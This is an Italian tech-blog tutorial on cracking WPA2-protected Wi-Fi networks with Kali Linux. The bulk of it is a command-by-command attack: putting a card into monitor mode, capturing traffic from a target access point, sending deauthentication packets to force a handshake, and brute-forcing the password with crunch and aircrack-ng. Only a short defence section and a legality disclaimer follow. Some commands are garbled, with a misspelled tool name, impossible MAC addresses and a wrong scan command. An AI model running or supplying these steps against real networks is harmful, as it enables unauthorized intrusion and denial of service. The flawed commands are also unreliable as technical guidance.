Cari lettori di Tecnogalaxy, dopo aver visto come hackerare una rete wireless con protezione WPA2 oggi vedremo un’altra tecnica per hackerare rete wireless con protezione WPA2. I router di ultima generazione impostano di default l’autentificazione WPA o WPA2.

Gli attacchi alle reti Wi-Fi sono sempre più numerosi, quindi vengono potenziate e rese più sicure creando nuovi standard o nuovi algoritmi per crittografare le reti. Ognuno di essi presenta degli svantaggi e dei vantaggi però:

  • WEP: Usa l’algoritmo di cifratura stream RC4 ed è un vecchio standard con molte vulnerabilità;
  • WPA: Utilizza il protocollo TKIP e MIC con crittografia AES;
  • WPA2: detto anche IEEE 802.11i, utilizza AES (128 bit) e CCMP per la crittografia;

Una volta violata la rete wireless il malintenzionato potrebbe utilizzare questi tipi di attacchi:

  • Man-In-The-Middle: In questo attacco, l’hacker intercetta le comunicazioni che avvengono tra computer dell’obbiettivo e il server, sia le informazioni richieste che quelle ricevute;
  • Denial-of-service: L’attacco Denial of service è un attacco brutale che causa la disconnessione di tutti gli utenti dalla rete o della vittima designata;
  • Social-engineering: Questo tipo di attacco è uno dei più prevalenti al giorno d’oggi. L’attaccante cerca di carpire informazioni direttamente dall’interessato. E uno degli attacchi più difficili da rilevare.

Passiamo al divertimento. Come sempre ci viene incontro il nostro caro amico Kali Linux.

Hackerare rete wireless con protezione WPA2

Per fare questo tipo di test oltre a Kali Linux, dobbiamo utilizzare una scheda di rete che supporti il monitor mode, io utilizzo una scheda Alfa.

Iniziamo aprendo una shell, per killare i processi che potrebbero darci fastidio:

airmon-ng check kill

Vediamo la nostra scheda wireless da utilizzare

airmon-ng 
wlan0

Riscriviamo :

airmon-ng  check kill

Adesso mettiamo la scheda in monitor mode:

airmon-ng start wlan0

Facciamo un controllo se è andato tuto bene:

airmon-ng

Perfetto la nostra scheda adesso si chiama wlan0mon.

Adesso facciamo una scansione per vedere le reti wireless nelle nostre vicinanze:

airmon-ng wlan0mon

Perfetto siamo arrivati al punto di testare nostra rete wireless, apriamo una shell e scriviamo il seguente comando:

airodump-ng --ignore-negative-one --bssid 90:11:0D:5R:2W:S1 -c 7 -w test wlan0mon

Adesso dobbiamo intercettare l’handshake (la famosa stretta di mano).

aureplay-ng --deauth 10 --ignore-negative-one -a 90:11:0D:5R:2W:S1 -c A1:C4:01:6F:2A:NE wlan0mon

Adesso utiliziamo crunch per cercare di rompere la password.

crunch 8 8 abcdefghijklmnopqrstuvwxyz | aircrack-ng -b 90:11:0D:5R:2W:S1 test-01.cap -w-

Confermiamo e attendiamo che aircrack finisca il lavoro.

Il tempo del cracking dipende dalla grandezza del dizionario creato con crunch e dalla potenza del nostro computer.

Come difendersi da un attacco a una rete wireless

Come sempre tenere aggiornato il proprio router, se datato acquistarne uno di ultima generazione.

Disattivare il wps, cambiare subito la password di default del router e quella per collegarsi alla rete wireless, impostandone una complessa, ad esempio con caratteri !?@#\ etc…

Installare un software sul pc o un app sui devaice che effettua una scansione della vostra rete.

Nel caso trovasse un ip associato ad un devaice/computer non vostro, significa che la vostra rete è stata violata, spegnere subito il router.

Come sempre fatene buon uso facendo dei test sulla vostra rete , fare questi test su reti altrui è illegale.

Al prossimo articolo.

N.B.: Non mi assumo nessuna responsabilità dell’uso che farete della guida, in quanto stilata per uso didattico e formativo.

Giorgio Perego

IT Manager

Leggi anche:

Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!

Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.

Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.

© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.